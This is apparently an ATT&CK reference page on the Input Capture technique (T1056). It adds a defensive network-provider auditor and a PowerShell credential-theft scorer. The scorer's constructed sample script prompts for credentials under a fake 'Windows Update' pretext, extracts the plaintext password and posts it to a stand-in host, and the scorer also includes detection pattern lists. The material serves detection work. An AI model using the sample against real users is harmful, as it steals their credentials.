T1056 Input Capture

Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users routinely supply credentials in various locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking, which intercepts the input on its way to the legitimate consumer) or rely on deceiving the user into providing input to what they believe to be a genuine service (e.g. Web Portal Capture). Because the captured input is so often a credential, the technique serves both Collection and Credential Access.

Item Value
ID T1056
Sub-techniques T1056.001 (Keylogging), T1056.002 (GUI Input Capture), T1056.003 (Web Portal Capture), T1056.004 (Credential API Hooking)
Tactics TA0009 (Collection), TA0006 (Credential Access)
Platforms Linux, Network Devices, Windows, macOS
Version 1.4
Created 31 May 2017
Last Modified 24 October 2025

Procedure Examples

ID Name Description
G0087 APT39 APT39 has utilized tools to capture mouse movements. [11]
G1044 APT42 APT42 has used credential harvesting websites. [9]
S0631 Chaes Chaes has a module that can perform arbitrary API hooking. [5]
S0381 FlawedAmmyy FlawedAmmyy can collect mouse events. [6]
S1245 InvisibleFerret InvisibleFerret has collected mouse and keyboard events using "pyWinhook". [3]
S0641 Kobalos Kobalos has used a trojanized SSH client to capture the hostname, port, username and password used to establish an SSH connection from the compromised host. [7][8]
C0049 Leviathan Australian Intrusions Leviathan captured submitted multi-factor authentication codes and other technical artifacts related to remote access sessions during Leviathan Australian Intrusions. [13]
S1060 Mafalda Mafalda can conduct mouse event logging. [4]
S1059 metaMain metaMain can log mouse events. [4]
S1131 NPPSPY NPPSPY captures credentials entered into the Winlogon process: the logon notifications that Windows delivers to its legitimate network provider DLLs are also delivered to a newly registered malicious provider, which records the logon information in cleartext. [2]
G1046 Storm-1811 Storm-1811 has used a PowerShell script to capture user credentials after prompting the user to authenticate in order to run a malicious script masquerading as a legitimate update. [10]
C0039 Versa Director Zero Day Exploitation Versa Director Zero Day Exploitation intercepted and harvested credentials from user logins to compromised devices. [12]
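The NPPSPY row above describes a credential-capture mechanism that is cheap to hunt for: every network provider DLL that Windows has registered is loaded at logon and handed the user's cleartext credentials, so an unexpected entry in the provider list is a strong signal. The following checker is an added example written for this page, not code from ATT&CK or from the NPPSPY write-up. It reads the registered providers (from the live registry on Windows with `--live`, otherwise from a constructed sample that mimics an NPPSPY-style registration), compares them against a known-good baseline, and flags any provider whose DLL lives outside System32. The registry locations (`NetworkProvider\Order\ProviderOrder` and each service's `NetworkProvider\ProviderPath`) follow the cited write-up [2]; the baseline set of `RDPNP`, `LanmanWorkstation` and `webclient` is an assumption about a default Windows 10/11 build and should be replaced with the values recorded for your own image.

```python
"""Audit Windows Network Providers for NPPSPY-style credential capture.

Added example, not code from the ATT&CK page or the NPPSPY write-up.
Flags providers missing from a known-good baseline and providers whose
DLL path is outside System32. The baseline is an assumption (typical
Windows 10/11 defaults); replace it with your own build's values.
"""
import ntpath
import os
import re
import sys

# Assumed baseline: providers present on a default Windows 10/11 install.
BASELINE_PROVIDERS = {"RDPNP", "LanmanWorkstation", "webclient"}

# On Windows this is the real SystemRoot; elsewhere we assume C:\Windows.
SYSTEM_ROOT = os.environ.get("SystemRoot", r"C:\Windows")
SYSTEM32 = ntpath.join(SYSTEM_ROOT, "System32")

# Constructed sample mimicking an NPPSPY-style registration (not real telemetry).
SAMPLE_PROVIDER_ORDER = "RDPNP,LanmanWorkstation,webclient,NPPSpy"
SAMPLE_PROVIDER_PATHS = {
    "RDPNP": r"%SystemRoot%\System32\drprov.dll",
    "LanmanWorkstation": r"%SystemRoot%\System32\ntlanman.dll",
    "webclient": r"%SystemRoot%\System32\davclnt.dll",
    "NPPSpy": r"C:\Windows\Temp\NPPSpy.dll",
}


def parse_provider_order(value):
    """ProviderOrder is a comma-separated REG_SZ; return the names in load order."""
    return [p.strip() for p in value.split(",") if p.strip()]


def is_system32_path(path):
    """True if the expanded, normalised path lies under the System32 directory."""
    expanded = re.sub(r"%(SystemRoot|windir)%", lambda _m: SYSTEM_ROOT, path,
                      flags=re.IGNORECASE)
    # ntpath works on any host, so ..\ traversal and case are handled offline too.
    norm = ntpath.normcase(ntpath.normpath(expanded))
    return norm.startswith(ntpath.normcase(SYSTEM32) + "\\")


def audit_network_providers(provider_order, provider_paths, baseline=BASELINE_PROVIDERS):
    """Return [(provider_name, [reasons])] for every provider that deviates from the baseline."""
    known = {b.lower() for b in baseline}  # registry names are case-insensitive
    findings = []
    for name in parse_provider_order(provider_order):
        reasons = []
        if name.lower() not in known:
            reasons.append("not in baseline")
        path = provider_paths.get(name)
        if path is None:
            reasons.append("no ProviderPath registered")
        elif not is_system32_path(path):
            reasons.append("DLL outside System32: " + path)
        if reasons:
            findings.append((name, reasons))
    return findings


def read_live_registry():
    """Windows only: read ProviderOrder and each provider's ProviderPath from the live registry."""
    import winreg  # stdlib, available on Windows only
    hklm = winreg.HKEY_LOCAL_MACHINE
    with winreg.OpenKey(hklm, r"SYSTEM\CurrentControlSet\Control\NetworkProvider\Order") as key:
        order, _ = winreg.QueryValueEx(key, "ProviderOrder")
    paths = {}
    for name in parse_provider_order(order):
        try:
            sub = r"SYSTEM\CurrentControlSet\Services\%s\NetworkProvider" % name
            with winreg.OpenKey(hklm, sub) as key:
                paths[name], _ = winreg.QueryValueEx(key, "ProviderPath")
        except OSError:
            pass  # surfaced by the audit as "no ProviderPath registered"
    return order, paths


if __name__ == "__main__":
    if sys.platform == "win32" and "--live" in sys.argv:
        order, paths = read_live_registry()
    else:
        order, paths = SAMPLE_PROVIDER_ORDER, SAMPLE_PROVIDER_PATHS
    for name, reasons in audit_network_providers(order, paths):
        print("SUSPECT network provider %s: %s" % (name, "; ".join(reasons)))
```

Run it on the sample and only `NPPSpy` is reported (not in the baseline, DLL under `C:\Windows\Temp`). A baseline provider whose `ProviderPath` has been repointed outside System32 is still flagged on the path alone, which is the case this check is really for; a rename-to-legitimate-name attack would otherwise slip past a name-only baseline.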
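The Storm-1811 row describes the GUI-prompt variant: a PowerShell script that asks the user to authenticate for a fake update and then sends the credentials elsewhere. Where PowerShell script block logging (Event ID 4104) is enabled, the script text is available to a detection pipeline, and the combination that matters is an interactive credential prompt together with plaintext extraction of the password or a network send. The scorer below is an added example written for this page, not code from ATT&CK or from the cited campaign report [10]; the cmdlet and method patterns are assumptions about how such scripts are commonly written, not indicators from that report, and the two script blocks it runs over are constructed.

```python
"""Score PowerShell script block text for credential-prompt-and-exfiltrate behaviour.

Added example, not code from the ATT&CK page or the Storm-1811 report.
Input is the ScriptBlockText of an Event ID 4104 record (or any PowerShell
source). The pattern lists are assumptions about typical tradecraft.
"""
import re

# Interactive credential prompts shown to the user.
PROMPT_PATTERNS = [
    r"\bGet-Credential\b",
    r"\bPromptForCredential\b",
    r"\bRead-Host\b[^\n]*-AsSecureString",
]
# Ways of turning the SecureString result back into a cleartext password.
PLAINTEXT_PATTERNS = [
    r"GetNetworkCredential\(\)\.Password",
    r"\bConvertFrom-SecureString\b[^\n]*-AsPlainText",
    r"Marshal\]::(SecureStringToBSTR|PtrToStringAuto|PtrToStringBSTR)",
]
# Network primitives that could carry the result off-host.
EXFIL_PATTERNS = [
    r"\bInvoke-WebRequest\b",
    r"\bInvoke-RestMethod\b",
    r"Net\.WebClient\b",
    r"\.(UploadString|UploadData|UploadFile)\(",
    r"Net\.Sockets\.TcpClient\b",
    r"\bcurl\.exe\b",
]
# Weak signal only: wording that dresses the prompt up as an update or IT request.
LURE_PATTERN = r"\b(update|security patch|IT support|helpdesk|verify your)\b"


def _hits(patterns, text):
    return [p for p in patterns if re.search(p, text, re.IGNORECASE)]


def score_script_block(text):
    """Return (verdict, evidence). 'suspect' = prompt plus plaintext extraction or network send;
    'review' = prompt plus lure wording only; otherwise 'benign'."""
    evidence = {
        "prompt": _hits(PROMPT_PATTERNS, text),
        "plaintext": _hits(PLAINTEXT_PATTERNS, text),
        "exfil": _hits(EXFIL_PATTERNS, text),
        "lure": bool(re.search(LURE_PATTERN, text, re.IGNORECASE)),
    }
    if evidence["prompt"] and (evidence["plaintext"] or evidence["exfil"]):
        verdict = "suspect"
    elif evidence["prompt"] and evidence["lure"]:
        verdict = "review"
    else:
        verdict = "benign"
    return verdict, evidence


def scan_events(events):
    """events: iterable of {'RecordId': ..., 'ScriptBlockText': ...}; returns non-benign hits."""
    out = []
    for ev in events:
        verdict, evidence = score_script_block(ev.get("ScriptBlockText", ""))
        if verdict != "benign":
            out.append((ev.get("RecordId"), verdict, evidence))
    return out


# Constructed script blocks (not captured telemetry). The first is an ordinary
# admin pattern; the second prompts under an "update" pretext and posts the
# cleartext password to a hypothetical collection endpoint.
SAMPLE_BENIGN = r'''
$cred = Get-Credential -Message "Domain admin credentials for remote session"
Enter-PSSession -ComputerName fileserver01 -Credential $cred
'''
SAMPLE_SUSPECT = r'''
$cred = $host.ui.PromptForCredential("Windows Update", "Authenticate to install the pending update", $env:USERNAME, "")
$body = @{ u = $cred.UserName; p = $cred.GetNetworkCredential().Password } | ConvertTo-Json
Invoke-RestMethod -Uri "https://updates.example.invalid/api" -Method Post -Body $body
'''
SAMPLE_EVENTS = [
    {"RecordId": 1, "ScriptBlockText": SAMPLE_BENIGN},
    {"RecordId": 2, "ScriptBlockText": SAMPLE_SUSPECT},
]

if __name__ == "__main__":
    for record_id, verdict, evidence in scan_events(SAMPLE_EVENTS):
        print("record %s: %s %s" % (record_id, verdict.upper(), evidence))
```

The benign block prompts but never touches the plaintext password or the network, so it scores `benign`; the second block hits all three lists and scores `suspect`. Keep the `review` tier: a legitimate helpdesk script can legitimately say "update" next to `Get-Credential`, and the point of the tiering is to let plaintext extraction or a network send, not wording, drive the alert.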

References

1. Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.
2. Dray Agha. (2022, August 16). Cleartext Shenanigans: Gifting User Passwords to Adversaries With NPPSPY. Retrieved May 17, 2024.
3. Unit 42. (2023, November 21). Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North Korean Threat Actors. Retrieved October 17, 2025.
4. SentinelLabs. (2022, September 22). Metador Technical Appendix. Retrieved April 4, 2023.
5. Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021.
6. Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.
7. M.Léveillé, M.-E., Sanmillan, I. (2021, February 2). Kobalos – A complex Linux threat to high performance computing infrastructure. Retrieved August 24, 2021.
8. M.Léveillé, M.-E., Sanmillan, I. (2021, January). A WILD KOBALOS APPEARS: Tricksy Linux malware goes after HPCs. Retrieved August 24, 2021.
9. Rozmann, O., et al. (2024, May 1). Uncharmed: Untangling Iran's APT42 Operations. Retrieved October 9, 2024.
10. McGraw, T., Elkins, T., McCann, E. (2024, May 10). Ongoing Social Engineering Campaign Linked to Black Basta Ransomware Operators. Retrieved January 31, 2025.
11. FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020.
12. Black Lotus Labs. (2024, August 27). Taking The Crossroads: The Versa Director Zero-Day Exploitation. Retrieved August 27, 2024.
13. CISA et al. (2024, July 8). People's Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action. Retrieved February 3, 2025.